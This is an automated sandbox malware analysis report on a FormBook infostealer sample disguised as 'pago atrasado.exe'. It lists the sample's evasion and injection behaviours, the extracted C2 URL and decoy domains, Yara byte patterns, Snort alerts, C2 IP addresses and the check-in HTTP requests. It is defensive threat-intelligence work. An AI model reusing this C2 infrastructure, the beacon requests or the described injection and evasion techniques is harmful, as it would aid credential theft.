Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report pago atrasado.exe

Overview

General Information

Sample Name:pago atrasado.exe
Analysis ID:502137
MD5:f841c72b1c4cadc4c98903ad26a96a16
SHA1:06359aaf42a5ce60889ab7a93d8af7702b34630a
SHA256:eaa038a0020fee7ddfe2919203f20f15ca1d7eb19d90b168cade93b5cf8d7f43
Tags:exeFormbookxloader
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Self deletion via cmd delete
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • pago atrasado.exe (PID: 4308 cmdline: 'C:\Users\user\Desktop\pago atrasado.exe' MD5: F841C72B1C4CADC4C98903AD26A96A16)
    • pago atrasado.exe (PID: 2840 cmdline: 'C:\Users\user\Desktop\pago atrasado.exe' MD5: F841C72B1C4CADC4C98903AD26A96A16)
      • explorer.exe (PID: 3472 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • colorcpl.exe (PID: 248 cmdline: C:\Windows\SysWOW64\colorcpl.exe MD5: 746F3B5E7652EA0766BA10414D317981)
          • cmd.exe (PID: 4940 cmdline: /c del 'C:\Users\user\Desktop\pago atrasado.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.crisisinterventionadvocates.com/u9xn/"], "decoy": ["lifeguardingcoursenearme.com", "bolsaspapelcdmx.com", "parsleypkllqu.xyz", "68134.online", "shopthatlookboutique.com", "canlibahisportal.com", "oligopoly.city", "srchwithus.online", "151motors.com", "17yue.info", "auntmarysnj.com", "hanansalman.com", "heyunshangcheng.info", "doorslamersplus.com", "sfcn-dng.com", "highvizpeople.com", "seoexpertinbangladesh.com", "christinegagnonjewellery.com", "artifactorie.biz", "mre3.net", "webbyteanalysis.online", "medicmir.store", "shdxh.com", "salvationshippingsecurity.com", "michita.xyz", "itskosi.com", "aligncoachingconsulting.com", "cryptorickclub.art", "cyliamartisbackup.com", "ttemola.com", "mujeresenfarmalatam.com", "mykombuchafactory.com", "irasutoya-ryou.com", "envtmyouliqy.mobi", "expert-rse.com", "oddanimalsink.com", "piezoelectricenergy.com", "itservices-india.com", "wintwiin.com", "umgaleloacademy.com", "everythangbutwhite.com", "ishhs.xyz", "brandsofcannabis.com", "sculptingstones.com", "hilldetailingllc.com", "stone-project.net", "rbrituelbeaute.com", "atzoom.store", "pronogtiki.store", "baybeg.com", "b148tlrfee9evtvorgm5947.com", "msjanej.com", "western-overseas.info", "sharpecommunications.com", "atlantahomesforcarguys.com", "neosudo.com", "blulacedefense.com", "profilecolombia.com", "blacksaltspain.com", "sejiw3.xyz", "saint444.com", "getoken.net", "joycegsy.com", "fezora.xyz"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.326494354.00000000008E0000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000001.00000002.326494354.00000000008E0000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000001.00000002.326494354.00000000008E0000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16ac9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bdc:$sqlite3step: 68 34 1C 7B E1
    • 0x16af8:$sqlite3text: 68 38 2A 90 C5
    • 0x16c1d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
    00000002.00000000.286357081.0000000006D43000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000002.00000000.286357081.0000000006D43000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x46a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x4191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x47a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x9b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0xac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 25 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      1.1.pago atrasado.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        1.1.pago atrasado.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        1.1.pago atrasado.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x16ac9:$sqlite3step: 68 34 1C 7B E1
        • 0x16bdc:$sqlite3step: 68 34 1C 7B E1
        • 0x16af8:$sqlite3text: 68 38 2A 90 C5
        • 0x16c1d:$sqlite3text: 68 38 2A 90 C5
        • 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
        1.2.pago atrasado.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          1.2.pago atrasado.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18d97:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19e3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 13 entries

          Sigma Overview

          No Sigma rule has matched

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000001.00000002.326494354.00000000008E0000.00000040.00020000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.crisisinterventionadvocates.com/u9xn/"], "decoy": ["lifeguardingcoursenearme.com", "bolsaspapelcdmx.com", "parsleypkllqu.xyz", "68134.online", "shopthatlookboutique.com", "canlibahisportal.com", "oligopoly.city", "srchwithus.online", "151motors.com", "17yue.info", "auntmarysnj.com", "hanansalman.com", "heyunshangcheng.info", "doorslamersplus.com", "sfcn-dng.com", "highvizpeople.com", "seoexpertinbangladesh.com", "christinegagnonjewellery.com", "artifactorie.biz", "mre3.net", "webbyteanalysis.online", "medicmir.store", "shdxh.com", "salvationshippingsecurity.com", "michita.xyz", "itskosi.com", "aligncoachingconsulting.com", "cryptorickclub.art", "cyliamartisbackup.com", "ttemola.com", "mujeresenfarmalatam.com", "mykombuchafactory.com", "irasutoya-ryou.com", "envtmyouliqy.mobi", "expert-rse.com", "oddanimalsink.com", "piezoelectricenergy.com", "itservices-india.com", "wintwiin.com", "umgaleloacademy.com", "everythangbutwhite.com", "ishhs.xyz", "brandsofcannabis.com", "sculptingstones.com", "hilldetailingllc.com", "stone-project.net", "rbrituelbeaute.com", "atzoom.store", "pronogtiki.store", "baybeg.com", "b148tlrfee9evtvorgm5947.com", "msjanej.com", "western-overseas.info", "sharpecommunications.com", "atlantahomesforcarguys.com", "neosudo.com", "blulacedefense.com", "profilecolombia.com", "blacksaltspain.com", "sejiw3.xyz", "saint444.com", "getoken.net", "joycegsy.com", "fezora.xyz"]}
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 1.1.pago atrasado.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.pago atrasado.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.pago atrasado.exe.2330000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.pago atrasado.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.pago atrasado.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.pago atrasado.exe.2330000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000002.326494354.00000000008E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.286357081.0000000006D43000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.248580224.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.326520078.0000000000910000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.514967425.0000000002B00000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.249155539.0000000002330000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.270365101.0000000006D43000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.511956241.00000000001B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.326181287.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.514678237.0000000002A00000.00000040.00020000.sdmp, type: MEMORY
          Machine Learning detection for sampleShow sources
          Source: pago atrasado.exeJoe Sandbox ML: detected
          Source: 0.2.pago atrasado.exe.2330000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 16.2.colorcpl.exe.4a4796c.4.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 16.2.colorcpl.exe.2b2c88.1.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 1.2.pago atrasado.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.1.pago atrasado.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: pago atrasado.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: Binary string: colorcpl.pdbGCTL source: pago atrasado.exe, 00000001.00000002.327276708.0000000002970000.00000040.00020000.sdmp
          Source: Binary string: colorcpl.pdb source: pago atrasado.exe, 00000001.00000002.327276708.0000000002970000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: pago atrasado.exe, 00000000.00000003.243423683.000000000F230000.00000004.00000001.sdmp, pago atrasado.exe, 00000001.00000003.248757919.0000000000670000.00000004.00000001.sdmp, colorcpl.exe, 00000010.00000002.516530503.000000000462F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: pago atrasado.exe, colorcpl.exe
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 0_2_00405E93 FindFirstFileA,FindClose,0_2_00405E93
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 0_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_004054BD
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 0_2_00402671 FindFirstFileA,0_2_00402671
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 4x nop then pop ebx1_2_00406AB4
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 4x nop then pop ebx16_2_02B06AB5

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49790 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49790 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49790 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49793 -> 74.208.236.134:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49793 -> 74.208.236.134:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49793 -> 74.208.236.134:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49797 -> 3.64.163.50:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49797 -> 3.64.163.50:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49797 -> 3.64.163.50:80
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.crisisinterventionadvocates.com
          Source: C:\Windows\explorer.exeDomain query: www.ttemola.com
          Source: C:\Windows\explorer.exeNetwork Connect: 208.91.197.27 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 3.64.163.50 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 46.101.121.244 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 74.208.236.134 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.baybeg.com
          Source: C:\Windows\explorer.exeDomain query: www.everythangbutwhite.com
          Source: C:\Windows\explorer.exeDomain query: www.highvizpeople.com
          Source: C:\Windows\explorer.exeDomain query: www.itskosi.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.oddanimalsink.com
          Source: C:\Windows\explorer.exeDomain query: www.ishhs.xyz
          Source: C:\Windows\explorer.exeDomain query: www.sfcn-dng.com
          Source: C:\Windows\explorer.exeDomain query: www.umgaleloacademy.com
          Performs DNS queries to domains with low reputationShow sources
          Source: C:\Windows\explorer.exeDNS query: www.ishhs.xyz
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.crisisinterventionadvocates.com/u9xn/
          Source: Joe Sandbox ViewASN Name: CONFLUENCE-NETWORK-INCVG CONFLUENCE-NETWORK-INCVG
          Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
          Source: global trafficHTTP traffic detected: GET /u9xn/?z0=rzasM82ZF5Q0VpfmrNE4kv3GDdRAHDJpM3U8JxcA+ITN6WDsXwhhZ+Z3rxJnSB0jHUWg&PjlT=JhfHclW8zdo HTTP/1.1Host: www.highvizpeople.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u9xn/?z0=Eyy2FmThgSczREyJUe5BPhqJIrAJD2iL3N0sS7pth5V4AuiiYZbYrcKb75E1rnMpvjAp&PjlT=JhfHclW8zdo HTTP/1.1Host: www.oddanimalsink.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u9xn/?z0=Q2BOOCh2YmRGzHBLpF4ZGgsAfzPJKYPCPJSLTy3o+TqCnIZHYQwJa/p1Zgpwk24Ey+uX&PjlT=JhfHclW8zdo HTTP/1.1Host: www.itskosi.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u9xn/?z0=LAjf/xx2BjlKOSx2Nw0FybGnOLdFfrA16q3xOuIsu5dbrvvju1demR4HH9h71lmoA2bo&PjlT=JhfHclW8zdo HTTP/1.1Host: www.crisisinterventionadvocates.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u9xn/?z0=a5IGPNkliMrRjEJlFMTr6wLc8iEcWRvcvuUq3Ax8SYLvcABDJqlPe7bn0Dwhj5qYaiRJ&PjlT=JhfHclW8zdo HTTP/1.1Host: www.everythangbutwhite.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 208.91.197.27 208.91.197.27
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 13 Oct 2021 14:44:25 GMTContent-Type: text/htmlContent-Length: 275ETag: "615f9601-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 626Connection: closeDate: Wed, 13 Oct 2021 14:44:46 GMTServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 59 6f 75 72 20 62 72 6f 77 73 65 72 20 63 61 6e 27 74 20 66 69 6e 64 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 20 63 6f 72 72 65 73 70 6f 6e 64 69 6e 67 20 74 6f 20 74 68 65 20 55 52 4c 20 79 6f 75 20 74 79 70 65 64 20 69 6e 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.eot
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.eot?#iefix
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.otf
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.svg#open-sans-bold
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.ttf
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.woff
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.woff2
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans/open-sans.eot
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans/open-sans.eot?#iefix
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans/open-sans.otf
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans/open-sans.svg#open-sans
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans/open-sans.ttf
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans/open-sans.woff
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans/open-sans.woff2
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/js/min.js?v2.3
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpg
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/27586/searchbtn.png)
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/27587/BG_2.png)
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/27587/Left.png)
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/27587/Right.png)
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpg
          Source: pago atrasado.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: pago atrasado.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://www.Highvizpeople.com
